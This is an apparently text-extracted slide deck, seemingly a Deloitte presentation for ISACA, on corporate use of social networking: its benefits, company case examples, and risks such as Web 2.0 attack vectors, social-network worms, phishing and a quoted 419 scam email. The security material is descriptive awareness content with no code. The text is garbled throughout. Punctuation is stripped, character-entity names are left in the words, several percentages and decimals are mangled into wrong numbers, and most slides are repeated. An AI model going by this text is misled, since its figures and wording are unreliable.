bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
